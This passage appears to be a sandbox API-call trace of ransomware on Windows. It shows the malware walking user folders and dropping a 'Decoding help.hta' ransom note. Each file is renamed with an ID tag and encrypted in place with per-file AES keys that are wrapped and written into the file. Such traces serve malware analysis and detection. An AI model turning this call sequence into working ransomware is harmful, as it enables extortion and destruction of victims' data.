[0043.137] WriteFile (in: hFile=0x708, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x177dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x177dfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.137] CloseHandle (hObject=0x708) returned 1 [0043.138] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.138] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x177dfd30 | out: lpFindFileData=0x177dfd30*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0043.139] FindClose (in: hFindFile=0x671a70 | out: hFindFile=0x671a70) returned 1 Thread: id = 357 os_tid = 0xa84 [0043.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*", lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 358 os_tid = 0xa8c [0043.154] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*", lpFindFileData=0x17a5fd30 | out: lpFindFileData=0x17a5fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 359 os_tid = 0xa80 [0043.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*", lpFindFileData=0x17b9fd30 | out: lpFindFileData=0x17b9fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 360 os_tid = 0xa5c [0043.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*", lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x100b5610, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x100b5610, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a10 [0043.174] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.174] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x100b5610, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x100b5610, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.174] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.174] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.174] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8349b650, ftCreationTime.dwHighDateTime=0x1d4d25b, ftLastAccessTime.dwLowDateTime=0xa6719c50, ftLastAccessTime.dwHighDateTime=0x1d4c8bb, ftLastWriteTime.dwLowDateTime=0xa6719c50, ftLastWriteTime.dwHighDateTime=0x1d4c8bb, nFileSizeHigh=0x0, nFileSizeLow=0x19a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="0Q8doMuQ.swf", cAlternateFileName="")) returned 1 [0043.174] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.175] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" [0043.175] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decoding help.hta")) returned 0xffffffff [0043.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0043.175] WriteFile (in: hFile=0x5a8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x17cdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.176] CloseHandle (hObject=0x5a8) returned 1 [0043.176] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.176] lstrcmpiW (lpString1="Decoding help.hta", lpString2="0Q8doMuQ.swf") returned 1 [0043.176] lstrlenW (lpString="0Q8doMuQ.swf") returned 12 [0043.176] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.176] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="0Q8doMuQ.swf" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf" [0043.176] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf" [0043.176] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf.[ID]g9uZrLhJaygpwRm1[ID]" [0043.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0q8domuq.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0q8domuq.swf.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0q8domuq.swf.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0043.177] CreateFileMappingA (hFile=0x5a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4f8 [0043.177] CryptAcquireContextA (in: phProv=0x17cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17cdfcec*=0x3448b60) returned 1 [0043.178] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x17cdfce8 | out: phKey=0x17cdfce8*=0x5d8a50) returned 1 [0043.178] CryptExportKey (in: hKey=0x5d8a50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17cdfbe4, pdwDataLen=0x17cdfce4 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfce4*=0x2c) returned 1 [0043.178] MapViewOfFile (hFileMappingObject=0x4f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19a0) returned 0x8c30000 [0043.180] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x100) returned 1 [0043.180] CryptEncrypt (in: hKey=0x5d8a50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c30000*, pdwDataLen=0x17cdfce4*=0x19a0, dwBufLen=0x19a0 | out: pbData=0x8c30000*, pdwDataLen=0x17cdfce4*=0x19a0) returned 1 [0043.180] UnmapViewOfFile (lpBaseAddress=0x8c30000) returned 1 [0043.182] CloseHandle (hObject=0x4f8) returned 1 [0043.182] CryptDestroyKey (hKey=0x5d8a50) returned 1 [0043.182] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0043.182] SetFilePointerEx (in: hFile=0x5a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.182] WriteFile (in: hFile=0x5a8, lpBuffer=0x17cdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x17cdfbe4*, lpNumberOfBytesWritten=0x17cdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.182] WriteFile (in: hFile=0x5a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17cdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.183] CloseHandle (hObject=0x5a8) returned 1 [0043.183] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0Q8doMuQ.swf.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.184] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ad3b650, ftCreationTime.dwHighDateTime=0x1d4cabd, ftLastAccessTime.dwLowDateTime=0x6cce9a70, ftLastAccessTime.dwHighDateTime=0x1d4ca0a, ftLastWriteTime.dwLowDateTime=0x6cce9a70, ftLastWriteTime.dwHighDateTime=0x1d4ca0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5sDDnuccNjG8e", cAlternateFileName="5SDDNU~1")) returned 1 [0043.184] lstrcmpW (lpString1=".", lpString2="5sDDnuccNjG8e") returned -1 [0043.184] lstrcmpW (lpString1="..", lpString2="5sDDnuccNjG8e") returned -1 [0043.184] lstrcmpiW (lpString1="windows", lpString2="5sDDnuccNjG8e") returned 1 [0043.184] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.184] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="5sDDnuccNjG8e" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e" [0043.184] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\5sDDnuccNjG8e\\*.*" [0043.184] GlobalMemoryStatus (in: lpBuffer=0x17cdfd10 | out: lpBuffer=0x17cdfd10) [0043.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108c8590, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5a8 [0043.186] CloseHandle (hObject=0x5a8) returned 1 [0043.186] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6095f40, ftCreationTime.dwHighDateTime=0x1d4cffb, ftLastAccessTime.dwLowDateTime=0x17607910, ftLastAccessTime.dwHighDateTime=0x1d4cc52, ftLastWriteTime.dwLowDateTime=0x17607910, ftLastWriteTime.dwHighDateTime=0x1d4cc52, nFileSizeHigh=0x0, nFileSizeLow=0xcf91, dwReserved0=0x0, dwReserved1=0x0, cFileName="CIrdEedWE6.mkv", cAlternateFileName="CIRDEE~1.MKV")) returned 1 [0043.186] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.186] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" [0043.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decoding help.hta")) returned 0x1 [0043.187] lstrcmpiW (lpString1="Decoding help.hta", lpString2="CIrdEedWE6.mkv") returned 1 [0043.187] lstrlenW (lpString="CIrdEedWE6.mkv") returned 14 [0043.187] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.187] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="CIrdEedWE6.mkv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv" [0043.187] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv" [0043.187] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv.[ID]g9uZrLhJaygpwRm1[ID]" [0043.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cirdeedwe6.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cirdeedwe6.mkv.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cirdeedwe6.mkv.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0043.188] CreateFileMappingA (hFile=0x5a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6c0 [0043.188] CryptAcquireContextA (in: phProv=0x17cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17cdfcec*=0x3448b60) returned 1 [0043.189] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x17cdfce8 | out: phKey=0x17cdfce8*=0x5d8a50) returned 1 [0043.189] CryptExportKey (in: hKey=0x5d8a50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17cdfbe4, pdwDataLen=0x17cdfce4 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfce4*=0x2c) returned 1 [0043.189] MapViewOfFile (hFileMappingObject=0x6c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcf80) returned 0x8cb0000 [0043.190] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x100) returned 1 [0043.191] CryptEncrypt (in: hKey=0x5d8a50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000, pdwDataLen=0x17cdfce4*=0xcf80, dwBufLen=0xcf80 | out: pbData=0x8cb0000*, pdwDataLen=0x17cdfce4*=0xcf80) returned 1 [0043.191] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0043.193] CloseHandle (hObject=0x6c0) returned 1 [0043.193] CryptDestroyKey (hKey=0x5d8a50) returned 1 [0043.193] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0043.193] SetFilePointerEx (in: hFile=0x5a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.193] WriteFile (in: hFile=0x5a8, lpBuffer=0x17cdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x17cdfbe4*, lpNumberOfBytesWritten=0x17cdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.194] WriteFile (in: hFile=0x5a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17cdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.194] CloseHandle (hObject=0x5a8) returned 1 [0043.195] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CIrdEedWE6.mkv.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.196] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0043.196] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.196] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.196] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" [0043.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decoding help.hta")) returned 0x1 [0043.196] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0043.196] lstrlenW (lpString="desktop.ini") returned 11 [0043.196] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.196] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.196] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" [0043.196] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" [0043.196] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0043.196] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0043.197] CreateFileMappingA (hFile=0x5a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6c0 [0043.197] CryptAcquireContextA (in: phProv=0x17cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17cdfcec*=0x3448b60) returned 1 [0043.198] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x17cdfce8 | out: phKey=0x17cdfce8*=0x6714f0) returned 1 [0043.198] CryptExportKey (in: hKey=0x6714f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17cdfbe4, pdwDataLen=0x17cdfce4 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfce4*=0x2c) returned 1 [0043.198] MapViewOfFile (hFileMappingObject=0x6c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e0) returned 